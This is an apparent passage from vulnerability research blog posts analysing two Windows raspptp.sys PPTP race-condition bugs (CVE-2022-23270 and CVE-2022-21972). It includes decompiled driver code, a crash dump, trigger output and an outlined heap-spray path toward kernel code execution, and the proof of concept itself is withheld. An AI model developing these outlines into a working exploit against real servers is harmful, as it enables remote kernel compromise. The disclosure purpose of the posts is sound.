            NdisFreeTimerObject(v5);
        v6 = lpCallToBeFreed->hCtlCallAckTimeoutTimerObject;
        if ( v6 )
            NdisFreeTimerObject(v6);
        v7 = lpCallToBeFreed->hCtlDieTimeoutTimerObject;
        if ( v7 )
            NdisFreeTimerObject(v7);
        ExFreePoolWithTag(lpCallToBeFreed, 0);
    }
}

In CallFree, raspptp.sys does not null out any of the sub-object pointers. This means that any one of these objects could cause a double free, giving us several different locations where we can expect an issue to occur when triggering the vulnerability.
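The free-and-null idiom is a common hardening step for teardown code like CallFree: clear each pointer as soon as its object is released, so a second pass over the same structure finds NULL and skips it. The sketch below uses `malloc`/`free` as stand-ins for NdisFreeNetBufferList and NdisFreeIoWorkItem, and the field names are hypothetical. This only helps while the containing structure is still allocated; it does not fix the race itself, because in this bug the second CallFree would be reading a context that ExFreePoolWithTag has already released.

```c
#include <assert.h>
#include <stdlib.h>

typedef struct call_resources {
    void *net_buffer_list;     /* stand-ins for the sub-objects released by CallFree */
    void *work_item_a;
    void *work_item_b;
} call_resources;

static int g_releases;         /* demo instrumentation: number of real frees */

/* Free the object behind *slot once, then clear the pointer. */
static void release(void **slot)
{
    assert(slot != NULL);
    if (*slot != NULL) {
        free(*slot);
        *slot = NULL;          /* nulling makes a repeated teardown a no-op */
        g_releases++;
    }
}

static void call_free_resources(call_resources *r)
{
    release(&r->net_buffer_list);
    release(&r->work_item_a);
    release(&r->work_item_b);
}
```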

Something that you may notice looking at the code snippets for this vulnerability is that there are large portions of overlapping locks. These will in effect cause each thread not to be able to enter certain sections of the cleanup and freeing process at the same time, which makes the race condition harder to predict. However, it does not prevent it from being possible.

We have knowingly not included many of the other hazards and caveats for triggering this vulnerability, as there are just too many different factors to go over, and in actuality a lot of them are self-correcting (luckily for us). The main reason we can ignore a lot of these hazards is that none of them truly stop the two threads from entering the vulnerable condition!

Proof of Concept

We will not yet be publishing our PoC for this vulnerability, to allow time for patches to be fully adopted. This unfortunately makes it hard to show the exact process we took to trigger the vulnerability, but we will release the PoC script at a later date! For now, here is a little sneak peek at the output:

[+] Race Condition Trigger Attempt: 1, With spacing 0 and sled 25
[+] Race Condition Trigger Attempt: 2, With spacing 0 and sled 25
[+] Race Condition Trigger Attempt: 3, With spacing 0 and sled 25
[+] Race Condition Trigger Attempt: 4, With spacing 0 and sled 25
[+] Race Condition Trigger Attempt: 5, With spacing 0 and sled 25
[+] Race Condition Trigger Attempt: 6, With spacing 0 and sled 25
[+] Race Condition Trigger Attempt: 7, With spacing 0 and sled 25
[+] Race Condition Trigger Attempt: 8, With spacing 0 and sled 25
[+] Race Condition Trigger Attempt: 9, With spacing 0 and sled 25
[+] Race Condition Trigger Attempt: 10, With spacing 0 and sled 25
[+] Race Condition Trigger Attempt: 11, With spacing 0 and sled 25
[+] Race Condition Trigger Attempt: 12, With spacing 0 and sled 25
[+] Race Condition Trigger Attempt: 13, With spacing 0 and sled 25
[+] Race Condition Trigger Attempt: 14, With spacing 0 and sled 25
[+] Race Condition Trigger Attempt: 15, With spacing 0 and sled 25
[+] Race Condition Trigger Attempt: 16, With spacing 0 and sled 25
[+] Race Condition Trigger Attempt: 17, With spacing 0 and sled 25
[+] Race Condition Trigger Attempt: 18, With spacing 0 and sled 25
[+] Race Condition Trigger Attempt: 19, With spacing 0 and sled 25
[+] Race Condition Trigger Attempt: 20, With spacing 0 and sled 25
[+] Race Condition Trigger Attempt: 21, With spacing 0 and sled 25
[+] Race Condition Trigger Attempt: 22, With spacing 0 and sled 25
[+] Race Condition Trigger Attempt: 23, With spacing 0 and sled 25
[+] Race Condition Trigger Attempt: 24, With spacing 0 and sled 25
[+] Race Condition Trigger Attempt: 25, With spacing 0 and sled 25
[+] Race Condition Trigger Attempt: 26, With spacing 0 and sled 25
[****] The Server Has Crashed!

A Wild Crash Appeared!

The first step in PoC development is achieving a successful trigger of a vulnerability, and for kernel vulnerabilities this usually means causing a crash! Here it is: a successful trigger of our race condition causing the target server to show us the iconic Blue Screen of Death (BSOD):

This crash produced the following bug check analysis, and it's pretty conclusive that we’ve caused one of the intended double free scenarios.

*******************************************************************************
* *
* Bugcheck Analysis *
* *
*******************************************************************************

KERNEL_SECURITY_CHECK_FAILURE (139)
A kernel component has corrupted a critical data structure. The corruption
could potentially allow a malicious user to gain control of this machine.
Arguments:
Arg1: 0000000000000003, A LIST_ENTRY has been corrupted (i.e. double remove).
Arg2: ffffa8875b31e820, Address of the trap frame for the exception that caused the bugcheck
Arg3: ffffa8875b31e778, Address of the exception record for the exception that caused the bugcheck
Arg4: 0000000000000000, Reserved

Debugging Details:
------------------

KEY_VALUES_STRING: 1

Key : Analysis.CPU.mSec
Value: 5327

Key : Analysis.DebugAnalysisManager
Value: Create

Key : Analysis.Elapsed.mSec
Value: 22625

Key : Analysis.Init.CPU.mSec
Value: 46452

Key : Analysis.Init.Elapsed.mSec
Value: 9300845

Key : Analysis.Memory.CommitPeak.Mb
Value: 82

Key : FailFast.Name
Value: CORRUPT_LIST_ENTRY

Key : FailFast.Type
Value: 3

Key : WER.OS.Branch
Value: fe_release

Key : WER.OS.Timestamp
Value: 2021-05-07T15:00:00Z

Key : WER.OS.Version
Value: 10.0.20348.1

BUGCHECK_CODE: 139

BUGCHECK_P1: 3

BUGCHECK_P2: ffffa8875b31e820

BUGCHECK_P3: ffffa8875b31e778

BUGCHECK_P4: 0

TRAP_FRAME: ffffa8875b31e820 -- (.trap 0xffffa8875b31e820)
NOTE: The trap frame does not contain all registers.
Some register values may be zeroed or incorrect.
rax=0000000000000000 rbx=0000000000000000 rcx=0000000000000003
rdx=ffffcf88f1a78338 rsi=0000000000000000 rdi=0000000000000000
rip=fffff8025f8d8ae1 rsp=ffffa8875b31e9b0 rbp=ffffcf88f1ae0602
r8=0000000000000010 r9=000000000000000b r10=fffff8025b0ddcb0
r11=0000000000000001 r12=0000000000000000 r13=0000000000000000
r14=0000000000000000 r15=0000000000000000
iopl=0 nv up ei pl nz na pe nc
NDIS!ndisFreeNblToNPagedPool+0x91:
fffff802`5f8d8ae1 cd29 int 29h
Resetting default scope

EXCEPTION_RECORD: ffffa8875b31e778 -- (.exr 0xffffa8875b31e778)
ExceptionAddress: fffff8025f8d8ae1 (NDIS!ndisFreeNblToNPagedPool+0x0000000000000091)
ExceptionCode: c0000409 (Security check failure or stack buffer overrun)
ExceptionFlags: 00000001
NumberParameters: 1
Parameter[0]: 0000000000000003
Subcode: 0x3 FAST_FAIL_CORRUPT_LIST_ENTRY

PROCESS_NAME: System

ERROR_CODE: (NTSTATUS) 0xc0000409 - The system detected an overrun of a stack-based buffer in this application. This overrun could potentially allow a malicious user to gain control of this application.

EXCEPTION_CODE_STR: c0000409

EXCEPTION_PARAMETER1: 0000000000000003

EXCEPTION_STR: 0xc0000409

STACK_TEXT:
ffffa887`5b31dcf8 fffff802`5b354ea2 : ffffa887`5b31de60 fffff802`5b17bb30 ffff9200`174e5180 00000000`00000000 : nt!DbgBreakPointWithStatus
ffffa887`5b31dd00 fffff802`5b3546ed : ffff9200`00000003 ffffa887`5b31de60 fffff802`5b22c910 00000000`00000139 : nt!KiBugCheckDebugBreak+0x12
ffffa887`5b31dd60 fffff802`5b217307 : ffffa887`5b31e4e0 ffff9200`1732a180 ffffcf88`ef584700 fffffff6`00000004 : nt!KeBugCheck2+0xa7d
ffffa887`5b31e4c0 fffff802`5b229d69 : 00000000`00000139 00000000`00000003 ffffa887`5b31e820 ffffa887`5b31e778 : nt!KeBugCheckEx+0x107
ffffa887`5b31e500 fffff802`5b22a1b2 : 00000000`00000000 fffff802`5f5a1285 ffffcf88`edd5c210 fffff802`5b041637 : nt!KiBugCheckDispatch+0x69
ffffa887`5b31e640 fffff802`5b228492 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : nt!KiFastFailDispatch+0xb2
ffffa887`5b31e820 fffff802`5f8d8ae1 : ffffcf88`ef584c00 ffffcf88`ef584700 00000000`00000000 00000000`00000000 : nt!KiRaiseSecurityCheckFailure+0x312
ffffa887`5b31e9b0 fffff802`5f8d5d3d : ffffcf88`f1a78350 00000000`00000000 ffffcf88`f1ae06b8 01000000`000002d0 : NDIS!ndisFreeNblToNPagedPool+0x91
ffffa887`5b31e9e0 fffff802`62bd2f7d : ffffcf88`f1ae06b8 fffff802`62bda000 ffffcf88`f1a78050 ffffcf88`f202dd70 : NDIS!NdisFreeNetBufferList+0x11d
ffffa887`5b31ea20 fffff802`62bd323f : ffffcf88`f202dd70 ffffcf88`ef57f1a0 ffffcf88`ef1fc7e8 ffffcf88`f1ae0698 : raspptp!CallFree+0x65
ffffa887`5b31ea50 fffff802`62bd348e : ffffcf88`f1a78050 00000000`00040246 ffffa887`5b31eaa0 00000000`00000018 : raspptp!CallpFinalDerefEx+0x7f
ffffa887`5b31ea80 fffff802`62bd2bad : ffffcf88`f1ae06b8 ffffcf88`f1a78050 00000000`0000000b ffffcf88`f1a78050 : raspptp!DereferenceRefCount+0x1a
ffffa887`5b31eab0 fffff802`62be37b2 : ffffcf88`f1ae0660 ffffcf88`f1ae0698 ffffcf88`f1ae06b8 ffffcf88`f1a78050 : raspptp!CallCleanup+0x61d
ffffa887`5b31eb00 fffff802`62bd72bd : ffffcf88`00000000 ffffcf88`f15ce810 00000000`00000080 fffff802`62bd7290 : raspptp!CtlpCleanup+0x112
ffffa887`5b31eb90 fffff802`5b143425 : ffffcf88`ef586040 fffff802`62bd7290 00000000`00000000 00000000`00000000 : raspptp!MainPassiveLevelThread+0x2d
ffffa887`5b31ebf0 fffff802`5b21b2a8 : ffff9200`1732a180 ffffcf88`ef586040 fffff802`5b1433d0 00000000`00000000 : nt!PspSystemThreadStartup+0x55
ffffa887`5b31ec40 00000000`00000000 : ffffa887`5b31f000 ffffa887`5b319000 00000000`00000000 00000000`00000000 : nt!KiStartSystemThread+0x28

SYMBOL_NAME: raspptp!CallFree+65

MODULE_NAME: raspptp

IMAGE_NAME: raspptp.sys

STACK_COMMAND: .thread ; .cxr ; kb

BUCKET_ID_FUNC_OFFSET: 65

FAILURE_BUCKET_ID: 0x139_3_CORRUPT_LIST_ENTRY_raspptp!CallFree

OS_VERSION: 10.0.20348.1

BUILDLAB_STR: fe_release

OSPLATFORM_TYPE: x64

OSNAME: Windows 10

FAILURE_ID_HASH: {5d4f996e-8239-e9e8-d111-fdac16b209be}

Followup: MachineOwner
---------

It turns out that the double free here triggers a kernel assertion on a linked list. The cause is one of the sub-objects on the call context structure that we mentioned earlier; according to the stack trace, it is the NET_BUFFER_LIST released through NdisFreeNetBufferList. Now, while crashes are great for PoCs, they are not great for exploits, so what do we need to do next if we want to look at further exploitation more seriously?
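The fast-fail subcode in the dump (Arg1 = 3, FAST_FAIL_CORRUPT_LIST_ENTRY) is the "safe unlinking" check that the Windows list helpers, such as RemoveEntryList, perform before removing an entry: both neighbours must still point back at the entry. The sketch below is our own user-mode re-implementation of that check, not NDIS code, and returns `false` where Windows would raise `int 29h`. Once an entry has been unlinked its neighbours no longer point at it, so a second removal of the same entry, as can happen if a freed object is released again, fails the check. Exactly which list ndisFreeNblToNPagedPool unlinks from is not shown in the dump, so treat the mapping as an assumption.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>

typedef struct list_entry {
    struct list_entry *flink;
    struct list_entry *blink;
} list_entry;

static void list_init(list_entry *head)
{
    head->flink = head->blink = head;
}

static void list_insert_tail(list_entry *head, list_entry *e)
{
    e->flink = head;
    e->blink = head->blink;
    head->blink->flink = e;
    head->blink = e;
}

/* Both neighbours must still point back at e; otherwise report corruption. */
static bool list_remove_checked(list_entry *e)
{
    assert(e != NULL);
    list_entry *next = e->flink;
    list_entry *prev = e->blink;
    if (next->blink != e || prev->flink != e)
        return false;          /* Windows would fast-fail here */
    prev->flink = next;
    next->blink = prev;
    return true;
}
```

Removing the same entry twice therefore succeeds the first time and is rejected the second time, while the rest of the list stays intact.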

Exploitation – Next Steps

The main way in which this particular double free could be exploited is to spray objects into the kernel heap so that the second free releases one of those objects instead of triggering the bug check shown above.

The first object that might make a good contender is the call context structure itself. If we were to spray a new call context into the freed memory between the two frees, we would end up with a freed call context structure still connected to a valid and accessible control connection. This new call context structure would consist mostly of freed memory that could then be used to cause further memory corruption and potentially achieve kernel RCE against a target server!

Conclusion

Race conditions are a particularly tricky class of vulnerabilities, especially when it comes to reliable exploitation. In this scenario we have a remarkably small window of opportunity to do something potentially dangerous. Exploit development, however, is the art of taking advantage of small opportunities. Achieving RCE with this vulnerability might seem unlikely, but it is certainly possible! RCE is also not the only use of this vulnerability: with local access to a target machine, it doubles as an opportunity for Local Privilege Escalation (LPE). All this makes CVE-2022-23270 something that, in the right hands, could be very dangerous.

Timeline

  • Vulnerability Reported To Microsoft – 29 October 2021
  • Vulnerability Acknowledged – 29 October 2021
  • Vulnerability Confirmed – 11 November 2021
  • Patch Release Date Confirmed – 12 January 2022
  • Patch Release – 10 May 2022

The post CVE-2022-23270 – Windows Server VPN Remote Kernel Use After Free Vulnerability (Part 2) appeared first on Nettitude Labs.

CVE-2022-21972: Windows Server VPN Remote Kernel Use After Free Vulnerability (Part 1)

CVE-2022-21972 is a Windows VPN Use after Free (UaF) vulnerability that was discovered through reverse engineering the raspptp.sys kernel driver. The vulnerability is a race condition issue and can be reliably triggered by sending crafted input to a vulnerable server. The vulnerability can be used to corrupt memory and could be used to gain kernel Remote Code Execution (RCE) or Local Privilege Escalation (LPE) on a target system.

Affected Versions

The vulnerability affects most versions of Windows Server and Windows Desktop since Windows Server 2008 and Windows 7 respectively. To see a full list of affected Windows versions check the official disclosure post on MSRC:

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-21972

The vulnerable code is present on both server and desktop distributions, however due to configuration differences, only the server deployment is exploitable.

Overview

This vulnerability is based heavily on how the raspptp.sys driver manages socket object life cycles. To understand the vulnerability, we must first understand some of the basics of how the kernel driver interacts with sockets to implement network functionality.

Sockets In The Windows Kernel – Winsock Kernel (WSK)

WSK is the name of the Windows socket API that can be used by drivers to create and use sockets directly from the kernel. Head over to https://docs.microsoft.com/en-us/windows-hardware/drivers/network/winsock-kernel-overview to see an overview of the system.

The WSK API is usually used through a set of event-driven callback functions. Effectively, once a socket is set up, a driver can provide a dispatch table containing a set of function pointers to be called for socket-related events. So that the driver can maintain its own state across these callbacks, it also supplies a context structure that is passed to each callback, allowing state to be tracked throughout the connection's life cycle.
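The dispatch-table-plus-context design can be shown without any kernel headers. The sketch below is a toy model with hypothetical names (`conn_dispatch`, `conn_ctx`, `accept_connection`), not the real WSK types; the actual tables, such as WSK_CLIENT_CONNECTION_DISPATCH, hold callbacks like WskReceiveEvent and WskDisconnectEvent that receive the driver's socket context pointer. The key point is that the socket layer never knows the driver's state: it only calls through the table and hands the context back.

```c
#include <assert.h>
#include <stddef.h>
#include <stdlib.h>

typedef struct conn_ctx conn_ctx;

/* Hypothetical, simplified stand-in for a WSK-style connection dispatch table. */
typedef struct conn_dispatch {
    int  (*on_receive)(conn_ctx *ctx, const unsigned char *data, size_t len);
    void (*on_disconnect)(conn_ctx *ctx);
} conn_dispatch;

struct conn_ctx {
    const conn_dispatch *dispatch;   /* table registered when the connection is accepted */
    size_t bytes_seen;               /* per-connection state carried through callbacks */
    int closed;
};

static int demo_receive(conn_ctx *ctx, const unsigned char *data, size_t len)
{
    (void)data;
    ctx->bytes_seen += len;
    return 0;
}

static void demo_disconnect(conn_ctx *ctx)
{
    ctx->closed = 1;
}

static const conn_dispatch demo_dispatch = { demo_receive, demo_disconnect };

/* "Accept": allocate a per-connection context and bind the dispatch table to it. */
static conn_ctx *accept_connection(const conn_dispatch *d)
{
    conn_ctx *ctx = calloc(1, sizeof *ctx);
    if (ctx != NULL)
        ctx->dispatch = d;
    return ctx;
}

/* The "socket layer" only calls through the table, passing the context back. */
static void deliver(conn_ctx *ctx, const unsigned char *data, size_t len)
{
    assert(ctx != NULL && ctx->dispatch != NULL);
    (void)ctx->dispatch->on_receive(ctx, data, len);
}
```

Because the context outlives any single callback, its lifetime has to be managed explicitly, which is where the rest of this post focuses.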

raspptp.sys and WSK

Now that we understand the basics of how sockets are interacted with in the kernel, let’s look at how the raspptp.sys driver uses WSK to implement the PPTP protocol.

The PPTP protocol specifies two socket connections: a TCP socket used for managing a VPN connection and a GRE (Generic Routing Encapsulation) socket used for sending and receiving the VPN network data. The TCP socket is the only one we care about for triggering this issue, so let's break down how raspptp.sys handles the life cycle of these connections with WSK:

  1. A new listening socket is created by the WskOpenSocket function in raspptp.sys. This function is passed a WSK_CLIENT_LISTEN_DISPATCH dispatch table with the WskConnAcceptEvent function specified as the WskAcceptEvent handler. This is the callback that handles a socket accept event, i.e. a new incoming connection.
  2. When a new client connects to the server, the WskConnAcceptEvent function is called. This function allocates a new context structure for the new client socket and registers a WSK_CLIENT_CONNECTION_DISPATCH dispatch table with all event callback functions specified. These are WskConnReceiveEvent, WskConnDisconnectEvent and WskConnSendBacklogEvent for receive, disconnect and send events respectively.
  3. Once the accept event is fully resolved, WskAcceptCompletion is called and a callback is triggered (CtlConnectQueryCallback) which completes initialisation of the PPTP control connection and creates a context structure specifically for tracking the state of the client’s PPTP control connection. This is the main object we care about for this vulnerability.

The PPTP Control connection context structure is allocated by the CtlAlloc function. Some abbreviated pseudo code for this function is:

PptpCtlCtx *__fastcall CtlAlloc(PptpAdapterContext *AdapterCtx)
{
    PptpAdapterContext *lpPptpAdapterCtx;
    PptpCtlCtx *PptpCtlCtx;
    PptpCtlCtx *lpPptpCtlCtx;
    NDIS_HANDLE lpNDISMiniportHandle;
    PDEVICE_OBJECT v6;
    __int64 v7;
    NDIS_HANDLE lpNDISMiniportHandle_1;
    NDIS_HANDLE lpNDISMiniportHandle_2;
    struct _NDIS_TIMER_CHARACTERISTICS TimerCharacteristics;

    lpPptpAdapterCtx = AdapterCtx;
    PptpCtlCtx = (PptpCtlCtx *)MyMemAlloc(0x290ui64, 'TPTP'); // Actual name of the allocator function in the raspptp.sys code
    lpPptpCtlCtx = PptpCtlCtx;
    if ( PptpCtlCtx )
    {
        memset(PptpCtlCtx, 0, 0x290ui64);
        ReferenceAdapter(lpPptpAdapterCtx);
        lpPptpCtlCtx->AllocTagPTPT = 'TPTP';
        lpPptpCtlCtx->CtlMessageTypeToLength = (unsigned int *)&PptpCtlMessageTypeToSizeArray;
        lpPptpCtlCtx->pPptpAdapterCtx = lpPptpAdapterCtx;
        KeInitializeSpinLock(&lpPptpCtlCtx->CtlSpinLock);
        lpPptpCtlCtx->CtlPptpWanEndpointsEntry.Blink = &lpPptpCtlCtx->CtlPptpWanEndpointsEntry;
        lpPptpCtlCtx->CtlCallDoubleLinkedList.Blink = &lpPptpCtlCtx->CtlCallDoubleLinkedList;
        lpPptpCtlCtx->CtlCallDoubleLinkedList.Flink = &lpPptpCtlCtx->CtlCallDoubleLinkedList;
        lpPptpCtlCtx->CtlPptpWanEndpointsEntry.Flink = &lpPptpCtlCtx->CtlPptpWanEndpointsEntry;
        lpPptpCtlCtx->CtlPacketDoublyLinkedList.Blink = &lpPptpCtlCtx->CtlPacketDoublyLinkedList;
        lpPptpCtlCtx->CtlPacketDoublyLinkedList.Flink = &lpPptpCtlCtx->CtlPacketDoublyLinkedList;
        lpNDISMiniportHandle = lpPptpAdapterCtx->MiniportNdisHandle;
        TimerCharacteristics.TimerFunction = (PNDIS_TIMER_FUNCTION)CtlpEchoTimeout;
        *(_DWORD *)&TimerCharacteristics.Header.Type = 0x180197;
        TimerCharacteristics.AllocationTag = 'TMTP';
        TimerCharacteristics.FunctionContext = lpPptpCtlCtx;
        if ( NdisAllocateTimerObject(
            lpNDISMiniportHandle,
            &TimerCharacteristics,
            &lpPptpCtlCtx->CtlEchoTimeoutNdisTimerHandle) )
        {
        ...
        }
        else
        {
            lpNDISMiniportHandle_1 = lpPptpAdapterCtx->MiniportNdisHandle;
            TimerCharacteristics.TimerFunction = (PNDIS_TIMER_FUNCTION)CtlpWaitTimeout;
            if ( NdisAllocateTimerObject(
                lpNDISMiniportHandle_1,
                &TimerCharacteristics,
                &lpPptpCtlCtx->CtlWaitTimeoutNdisTimerHandle) )
            {
                ...
            }
            else
            {
                lpNDISMiniportHandle_2 = lpPptpAdapterCtx->MiniportNdisHandle;
                TimerCharacteristics.TimerFunction = (PNDIS_TIMER_FUNCTION)CtlpStopTimeout;
                if ( !NdisAllocateTimerObject(
                    lpNDISMiniportHandle_2,
                    &TimerCharacteristics,
                    &lpPptpCtlCtx->CtlStopTimeoutNdisTimerHandle) )
                {
                    KeInitializeEvent(&lpPptpCtlCtx->CtlWaitTimeoutTriggered, NotificationEvent, 1u);
                    KeInitializeEvent(&lpPptpCtlCtx->CtlWaitTimeoutCancled, NotificationEvent, 1u);
                    lpPptpCtlCtx->CtlCtxReferenceCount = 1;// Set reference count to an initial value of one
                    lpPptpCtlCtx->fpCtlCtxFreeFn = (__int64)CtlFree;
                    ExInterlockedInsertTailList(
                        (PLIST_ENTRY)&lpPptpAdapterCtx->PptpWanEndpointsFlink,
                        &lpPptpCtlCtx->CtlPptpWanEndpointsEntry,
                        &lpPptpAdapterCtx->PptpAdapterSpinLock);
                    return lpPptpCtlCtx;
                }
                ...
            }
        }
        ...
    }
    if...
        return 0i64;
}

The important parts of this structure to note are the CtlCtxReferenceCount and CtlWaitTimeoutNdisTimerHandle structure members. This new context structure is stored on the socket context for the new client socket and can then be referenced for all of the events relating to the socket it binds to.

The only fields of the socket context structure that we care about are the following:

00000008 ContextPtr dq ? ; PptpCtlCtx
00000010 ContextRecvCallback dq ? ; CtlReceiveCallback
00000018 ContextDisconnectCallback dq ? ; CtlDisconnectCallback
00000020 ContextConnectQueryCallback dq ? ; CtlConnectQueryCallback
  • PptpCtlCtx – The PPTP specific context structure for the control connection.
  • CtlReceiveCallback – The PPTP control connection receive callback.
  • CtlDisconnectCallback – The PPTP control connection disconnect callback.
  • CtlConnectQueryCallback – The PPTP control connection query (used to get client information on a new connection being complete) callback.
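For readers who prefer C to an IDA structure listing, the offsets above can be expressed as a struct. This is a hypothetical reconstruction covering only the fields named in this post: the member at offset 0 is not described, so it is an opaque placeholder, the callback signatures are deliberately simplified, and the layout assumes an x64 build with 8-byte pointers.

```c
#include <assert.h>
#include <stddef.h>

/* Opaque here: the real PptpCtlCtx layout is not needed for this view. */
typedef struct PptpCtlCtx PptpCtlCtx;

/* Hypothetical prefix of the raspptp.sys client socket context (x64). */
typedef struct WskSocketCtxPrefix {
    void *Unknown0;                            /* 0x00: not described in the post */
    PptpCtlCtx *ContextPtr;                    /* 0x08: PptpCtlCtx */
    void (*ContextRecvCallback)(void);         /* 0x10: CtlReceiveCallback (signature simplified) */
    void (*ContextDisconnectCallback)(void);   /* 0x18: CtlDisconnectCallback */
    void (*ContextConnectQueryCallback)(void); /* 0x20: CtlConnectQueryCallback */
} WskSocketCtxPrefix;

/* Compile-time checks that the layout matches the listing on x64. */
static_assert(sizeof(void *) == 8, "x64 layout assumed");
static_assert(offsetof(WskSocketCtxPrefix, ContextPtr) == 0x08, "ContextPtr at 0x08");
static_assert(offsetof(WskSocketCtxPrefix, ContextRecvCallback) == 0x10, "recv callback at 0x10");
static_assert(offsetof(WskSocketCtxPrefix, ContextDisconnectCallback) == 0x18, "disconnect callback at 0x18");
static_assert(offsetof(WskSocketCtxPrefix, ContextConnectQueryCallback) == 0x20, "query callback at 0x20");
```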

raspptp.sys Object Life Cycles

The final bit of background information we need to understand before we delve into the vulnerability is the way that raspptp keeps these context structures alive for a given socket. In the case of the PptpCtlCtx structure, both the client socket and the PptpCtlCtx structure have a reference count.

This reference count is intended to be incremented every time a reference to either object is created. These are initially set to 1 and when decremented to 0 the objects are freed by calling a free callback stored within each structure. This obviously only works if the code remembers to increment and decrement the reference counts properly and correctly lock access across multiple threads when handling the respective structures.

Within raspptp.sys, the code that performs the reference increment and decrement functionality usually looks like this:

// Increment code
_InterlockedIncrement(&Ctx->ReferenceCount);

// Decrement Code
if ( _InterlockedExchangeAdd(&Ctx->ReferenceCount, 0xFFFFFFFF) == 1 )
    ((void (__fastcall *)(CtxType *))Ctx->fpFreeHandler)(Ctx);
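The same pattern can be sketched in portable user-mode C, using C11 atomics in place of the _Interlocked* intrinsics. The names here (RefCounted, Reference, Dereference, DefaultFree, g_freeCount) are hypothetical. The key detail is that the decrement returns the value from before the subtraction, so a result of 1 means the caller has just dropped the last reference and must free the object.

```c
#include <assert.h>
#include <stdatomic.h>
#include <stdlib.h>

typedef struct RefCounted RefCounted;
typedef void (*FreeFn)(RefCounted *obj);

struct RefCounted {
    atomic_long ReferenceCount; /* starts at 1 for the creator's reference */
    FreeFn FreeHandler;         /* called exactly once, when the count reaches 0 */
};

static int g_freeCount = 0; /* counts frees so the behaviour can be observed */

static void DefaultFree(RefCounted *obj) {
    g_freeCount++;
    free(obj);
}

static RefCounted *CreateRefCounted(FreeFn freeHandler) {
    RefCounted *obj = malloc(sizeof *obj);
    if (obj != NULL) {
        atomic_init(&obj->ReferenceCount, 1);
        obj->FreeHandler = freeHandler;
    }
    return obj;
}

static void Reference(RefCounted *obj) {
    atomic_fetch_add(&obj->ReferenceCount, 1);
}

/* Returns 1 if this call released the last reference and freed the object. */
static int Dereference(RefCounted *obj) {
    /* Like _InterlockedExchangeAdd(&count, 0xFFFFFFFF), atomic_fetch_sub
     * returns the previous value: 1 means the count is now 0. */
    long previous = atomic_fetch_sub(&obj->ReferenceCount, 1);
    assert(previous > 0 && "reference count underflow");
    if (previous == 1) {
        obj->FreeHandler(obj);
        return 1;
    }
    return 0;
}
```

Every Reference must be paired with exactly one Dereference. A path that uses the object without taking its own reference is relying on some other holder to keep the count above zero, which is the assumption this vulnerability violates.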

As you may have guessed at this point, the vulnerability we’re looking at is indeed due to incorrect handling of these reference counts and their respective locks, so now that we have covered the background stuff let’s jump into the juicy details!

The Vulnerability

The first part of our use after free vulnerability is in the code that handles receiving PPTP control data for a client connection. When new data is received by raspptp.sys, the WSK layer dispatches a call to the appropriate event callback. raspptp.sys registers a generic callback for all sockets called ReceiveData. This function parses the incoming data structures from WSK and forwards the incoming data to the client socket context’s own receive data callback. For a PPTP control connection, this callback is the CtlReceiveCallback function.

The section of the ReceiveData function that calls this callback has the following pseudo code. This snippet includes all the locking and reference increments that are used to protect the code against multi threaded access issues…

_InterlockedIncrement(&ClientCtx->ConnectionContextRefernceCount);
((void (__fastcall *)(PptpCtlCtx *, PptpCtlInputBufferCtx *, _NET_BUFFER_LIST *))ClientCtx->ContextRecvCallback)(
ClientCtx->ContextPtr,
lpCtlBufferCtx,
NdisNetBuffer);

The CtlReceiveCallback function has the following pseudo code:

__int64 __fastcall CtlReceiveCallback(PptpCtlCtx *PptpCtlCtx, PptpCtlInputBufferCtx *PptpBufferCtx, _NET_BUFFER_LIST *InputBufferList)
{
    PptpCtlCtx *lpPptpCtlCx;
    PNET_BUFFER lpInputFirstNetBuffer;
    _NET_BUFFER_LIST *lpInputBufferList;
    ULONG NetBufferLength;
    PVOID NetDataBuffer;

    lpPptpCtlCx = PptpCtlCtx;
    lpInputFirstNetBuffer = InputBufferList->FirstNetBuffer;
    lpInputBufferList = InputBufferList;
    NetBufferLength = lpInputFirstNetBuffer->DataLength;
    NetDataBuffer = NdisGetDataBuffer(lpInputFirstNetBuffer, lpInputFirstNetBuffer->DataLength, 0i64, 1u, 0);
    if ( NetDataBuffer )
        CtlpEngine(lpPptpCtlCx, (uchar *)NetDataBuffer, NetBufferLength);
    ReceiveDataComplete(lpPptpCtlCx->CtlWskClientSocketCtx, lpInputBufferList);
    return 0i64;
}

The CtlpEngine function is the state machine responsible for parsing the incoming PPTP control data. Now there is one very important piece of code that is missing from these two sections and that is any form of reference count increment or locking for the PptpCtlCtx object!

Neither of the callback handlers actually increments the reference count for the PptpCtlCtx or attempts to lock access to signify that it is in use. This is potentially a vulnerability, because if at any point the reference count were decremented, the object would be freed! However, if this is so bad, why isn’t every PPTP server just crashing all the time? The answer is that the CtlpEngine function itself uses the reference count correctly.

This is where things get confusing. Assuming that the raspptp.sys driver was completely single threaded, this implementation would be 100% safe as no part of the receive pipeline for the control connection decrements the object reference count without first performing an increment to account for it. In reality however, raspptp.sys is not a single threaded driver. Looking back at the initialization of the PptpCtlCtx object, there is one part of particular interest.

TimerCharacteristics.FunctionContext = PptpCtlCtx;
TimerCharacteristics.TimerFunction = (PNDIS_TIMER_FUNCTION)CtlpWaitTimeout;
if ( NdisAllocateTimerObject(
    lpNDISMiniportHandle_1,
    &TimerCharacteristics,
    &lpPptpCtlCtx->CtlWaitTimeoutNdisTimerHandle) )

Here we can see the allocation of an NDIS timer object. The actual implementation of these timers isn’t important; what matters is that these timers dispatch their callbacks on a separate thread from the one on which WSK dispatches the ReceiveData callback. Another interesting point is that both the timer callback and the receive callback use the PptpCtlCtx structure as their context.

So what does this timer callback do and when does it happen? The code that sets the timer is as follows:

NdisSetTimerObject(newClientCtlCtx->CtlWaitTimeoutNdisTimerHandle, (LARGE_INTEGER)-300000000i64, 0, 0i64);// 30 second timeout timer

We can see that a 30 second timer is set, and when those 30 seconds are up the CtlpWaitTimeout callback is called. This timer can be cancelled, but only when a client performs a PPTP control handshake with the server, so as long as we never send a valid handshake, the callback will be dispatched after 30 seconds. But what does it do?
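The -300000000 argument follows the usual kernel timer convention for NdisSetTimerObject: a negative due time is relative to the current time and is measured in 100-nanosecond units, so 300000000 × 100 ns = 30 seconds. A small sketch of the conversion (the helper names are hypothetical):

```c
#include <assert.h>
#include <stdint.h>

/* Kernel/NDIS due times are expressed in 100-nanosecond units. */
#define HUNDRED_NS_PER_SECOND 10000000LL

/* Convert a relative due time (negative, 100 ns units) into whole seconds. */
static int64_t RelativeDueTimeToSeconds(int64_t dueTime) {
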